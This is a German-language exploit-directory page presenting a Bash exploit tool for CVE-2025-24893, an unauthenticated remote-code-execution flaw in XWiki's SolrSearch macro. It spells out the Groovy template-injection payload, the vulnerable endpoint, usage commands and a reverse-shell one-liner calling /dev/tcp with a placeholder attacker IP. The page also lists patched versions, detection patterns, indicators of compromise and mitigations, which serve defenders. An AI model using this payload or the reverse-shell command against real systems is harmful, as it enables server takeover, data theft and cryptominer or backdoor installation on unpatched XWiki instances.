Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
XWiki-Platform-RCE-CVE-2025-24893 — Bash-Exploit für CVE-2025-24893, eine Schwachstelle für nicht authentifizierte Remote-Codeausführung in XWiki Platform durch Template-Injection im SolrSearch-Makro. | Kitploit
Tools/GitHubGitHub/0xdtc/xwiki-platform-rce-cve-2025-24893
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlPayload-Entwicklung
GitHub0xdtc/xwiki-platform-rce-cve-2025-24893

XWiki-Platform-RCE-CVE-2025-24893

Bash-Exploit für CVE-2025-24893, eine Schwachstelle für nicht authentifizierte Remote-Codeausführung in XWiki Platform durch Template-Injection im SolrSearch-Makro.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 8 MonatenNoch nicht geprüft

XWiki Platform – Nicht authentifizierter RCE-Exploit

Übersicht

Dieses Skript ist eine überarbeitete Bash-Implementierung eines Exploits, der auf von CVE-2025-24893 betroffene XWiki-Plattform-Versionen abzielt. Es nutzt eine kritische, nicht authentifizierte Schwachstelle zur Remote-Codeausführung aus, die es Angreifern ermöglicht, beliebigen Groovy-Code über einen Template-Injection-Fehler im SolrSearch-Macro auszuführen.

Die ursprünglichen Exploit-Implementierungen in Python wurden von verschiedenen Sicherheitsforschern erstellt und werden hier für Bash-Benutzer mit vereinfachter Ausführung und verbesserter Benutzerfreundlichkeit angepasst.

Details zur Schwachstelle

  • Entdecker: John Kwak (Trend Micro's Zero Day Initiative)
  • CVE: CVE-2025-24893
  • CVSS-Score: 9,8 (Kritisch)
  • Referenzen:
    • XWiki Official Security Advisory (GHSA-rr6p-3pfg-562j)
    • CISA Known Exploited Vulnerabilities Catalog
    • VulnCheck – XWiki CVE-2025-24893 Exploited in the Wild
    • OffSec Blog – Unauthenticated RCE in XWiki
  • Beschreibung: Die Schwachstelle resultiert aus einer unzureichenden Eingabebereinigung im SolrSearch-Macro innerhalb der XWiki-Plattform. Das Macro validiert und bereinigt die vom Benutzer bereitgestellte Eingabe im Parameter text nicht ordnungsgemäß, wenn auf den RSS-Medienendpunkt zugegriffen wird, sodass Angreifer ohne Authentifizierung schädlichen Groovy-Code in die Rendering-Pipeline einschleusen können.

Betroffene und gepatchte Versionen

Betroffene Versionen

  • XWiki-Plattform: 5.3-milestone-2 bis 15.10.10
  • XWiki-Plattform: 16.0.0-rc-1 bis 16.4.0

Gepatchte Versionen

  • XWiki 15.10.11 oder neuer
  • XWiki 16.4.1 oder neuer
  • XWiki 16.5.0RC1 oder neuer

Funktionen

  • Nicht authentifizierte RCE: Ausführen beliebiger Systembefehle ohne Authentifizierung.
  • CSRF-Token-Umgehung: Nutzt Template-Injection ohne CSRF-Token.
  • Hintergrundausführung: Führt Befehle asynchron auf dem Zielserver aus.
  • Einfache Kommandozeilenschnittstelle: Einfach zu bedienendes Bash-Skript mit minimalen Abhängigkeiten.

Voraussetzungen

  • Abhängigkeiten:
    • curl: Zum Senden von HTTP-Anfragen.
    • jq: Zur URL-Kodierung des Payloads.
    • Bash-Shell.
  • Getestete Umgebung: Linux-Betriebssystem mit Bash.

Verwendung

Erteilen Sie die Ausführungsberechtigungen:

root@kitploit:~
chmod +x CVE-2025-24893

Führen Sie das Skript mit den erforderlichen Argumenten aus:

root@kitploit:~
./CVE-2025-24893 <ziel_url> <befehl>

Parameter

ParameterBeschreibung
<ziel_url>Die Ziel-XWiki-URL (z. B. http://beispiel.de oder https://xwiki.beispiel.org). Das Protokoll ist optional.
<befehl>Der Systembefehl, der auf dem Zielserver ausgeführt werden soll.

Beispiel

Prüfen, ob das Ziel angreifbar ist (Befehl id ausführen):

root@kitploit:~
./CVE-2025-24893 http://verwundbares-xwiki.beispiel.de "id"

Systeminformationen abrufen:

root@kitploit:~
./CVE-2025-24893 http://verwundbares-xwiki.beispiel.de "uname -a"

Eine Testdatei erstellen:

root@kitploit:~
./CVE-2025-24893 http://verwundbares-xwiki.beispiel.de "touch /tmp/pwned"

Reverse Shell (ersetzen Sie Ihre IP und Ihren Port):

root@kitploit:~
./CVE-2025-24893 http://verwundbares-xwiki.beispiel.de "bash -c 'bash -i >& /dev/tcp/YOUR_IP/YOUR_PORT 0>&1'"

Skript-Workflow

  1. Parsen der Kommandozeilenargumente:

    • Validiert, dass sowohl Ziel-URL als auch Befehl angegeben wurden.
    • Normalisiert die URL, indem http:// hinzugefügt wird, falls kein Protokoll angegeben ist.
  2. Payload-Konstruktion:

    • Erstellt einen Groovy-Code-Payload, der den angegebenen Befehl mittels .execute() ausführt.
    • Verpackt den Payload in die XWiki-Macro-Syntax: }}}{{async async=false}}{{groovy}}<code>{{/groovy}}{{/async}}
  3. URL-Kodierung:

    • URL-kodiert den Payload mittels jq für eine ordnungsgemäße HTTP-Übertragung.
  4. Exploitation:

    • Sendet eine HTTP-GET-Anfrage an den verwundbaren SolrSearch-Endpunkt: /xwiki/bin/get/Main/SolrSearch?media=rss&text=<codierter_payload>
    • Der Befehl wird im Hintergrund auf dem Zielserver ausgeführt.

Technische Details

Ausnutzungsmechanismus

Die Exploit-Kette funktioniert wie folgt:

  1. Template-Injection: Der Angreifer erstellt einen schädlichen Payload, der Groovy-Code in XWiki-Macro-Syntax enthält.
  2. Endpunkt-Auswahl: Der Payload wird an den verwundbaren SolrSearch-RSS-Endpunkt gesendet.
  3. Code-Ausführung: Der injizierte Groovy-Code wird serverseitig ohne Authentifizierung ausgeführt.
  4. System-Kompromittierung: Der Angreifer erlangt eine beliebige Codeausführung mit den Privilegien der XWiki-Anwendung.

Payload-Struktur

root@kitploit:~
}}}{{async async=false}}{{groovy}}'<befehl>'.execute();{{/groovy}}{{/async}}
  • }}} – Schließt einen vorhandenen Macro-Kontext
  • {{async async=false}} – Stellt die synchrone Ausführung sicher
  • {{groovy}}...{{/groovy}} – Verpackt den schädlichen Groovy-Code
  • '<befehl>'.execute(); – Führt den angegebenen Systembefehl aus

Proof of Concept

Einrichtung der angreifbaren Umgebung

Zu Testzwecken können Sie eine verwundbare XWiki-Instanz mittels Docker einrichten:

root@kitploit:~
docker run -d -p 8080:8080 --name xwiki-vulnerable xwiki:15.10.10

Ausnutzungsdemo

root@kitploit:~
# Warten, bis XWiki gestartet ist (kann 1–2 Minuten dauern)
./CVE-2025-24893 http://localhost:8080 "whoami"

Auswirkungen

Eine erfolgreiche Ausnutzung dieser Schwachstelle ermöglicht einem nicht authentifizierten Angreifer:

  • Ausführen beliebiger Systembefehle auf dem Server
  • Lesen, Ändern oder Löschen sensibler Daten
  • Kompromittierung der gesamten XWiki-Installation
  • Zugriff auf andere Systeme im Netzwerk (Pivoting)
  • Bereitstellen von Kryptominern oder anderer Schadsoftware
  • Einrichten eines persistenten Hintertürzugangs

Realweltliche Ausnutzung

Laut CISA und mehreren Sicherheitsanbietern:

  • Aktive Ausnutzung: CVE-2025-24893 wird derzeit aktiv im Internet ausgenutzt
  • Angriffskampagnen: VulnCheck entdeckte zweistufige Angriffsketten, die Kryptominer einsetzen
  • CISA KEV-Katalog: Am 30. Oktober 2025 in den Katalog bekannter ausgenutzter Schwachstellen aufgenommen
  • Weit verbreitetes Scannen: Massenhaftes Internet-weites Scannen nach anfälligen Instanzen

Erkennung und Abhilfe

Erkennung

Überwachen Sie verdächtige Anfragen an den SolrSearch-Endpunkt:

root@kitploit:~
GET /xwiki/bin/get/Main/SolrSearch?media=rss&text=*

Achten Sie auf Muster, die Folgendes enthalten:

  • {{groovy}}
  • {{async}}
  • .execute()
  • URL-kodierte Varianten der obigen Muster

Indikatoren einer Kompromittierung (IoCs)

  • Unerwartete Prozesse, die durch den XWiki-Anwendungsbenutzer gestartet wurden
  • Neue Dateien in /tmp oder anderen beschreibbaren Verzeichnissen
  • Ausgehende Netzwerkverbindungen zu unbekannten IPs
  • Kryptominer-Prozesse (hohe CPU-Auslastung)

Abhilfemaßnahmen

  1. XWiki upgraden auf eine gepatchte Version:

    • Version 15.10.11 oder höher
    • Version 16.4.1 oder höher
    • Version 16.5.0RC1 oder höher
  2. Temporäre Workarounds anwenden (falls sofortiges Patchen nicht möglich ist):

    • Zugriff auf den SolrSearch-Endpunkt über eine Web Application Firewall (WAF) einschränken
    • Das SolrSearch-Macro deaktivieren, falls nicht benötigt
    • Netzwerksegmentierung implementieren, um die Angriffsfläche zu begrenzen
  3. Auf Kompromittierung prüfen:

    • Logs auf Ausnutzungsversuche überprüfen
    • Nach nicht autorisierten Dateiänderungen suchen
    • Nach Kryptominern und Hintertüren scannen

Einschränkungen

  • Befehle werden im Hintergrund ausgeführt; die Ausgabe ist möglicherweise nicht sofort sichtbar.
  • Die Überprüfung der Befehlsausführung erfordert Seitenkanäle (z. B. Erstellen von Dateien, Netzwerkverbindungen).
  • Erfordert, dass das SolrSearch-Macro auf dem Ziel aktiviert ist (Standardkonfiguration).

Danksagungen

  • Entdecker der Schwachstelle: John Kwak (Trend Micro's Zero Day Initiative)
  • Autoren des ursprünglichen Python-Exploits: Verschiedene Sicherheitsforscher
  • Angepasstes Skript: Überarbeitet von [0xdtc] in Bash

Haftungsausschluss

Dieses Skript dient ausschließlich zu Bildungszwecken. Die nicht autorisierte Nutzung dieses Tools gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben, ist illegal und unethisch. Verwenden Sie es verantwortungsvoll.

Sie müssen vor dem Testen eine ausdrückliche schriftliche Genehmigung des Systemeigentümers einholen.

Die Autoren dieses Tools übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Skript verursacht werden. Die Benutzer sind allein dafür verantwortlich, sicherzustellen, dass sie über die entsprechende Autorisierung verfügen und alle geltenden Gesetze und Vorschriften einhalten.

Tool herunterladen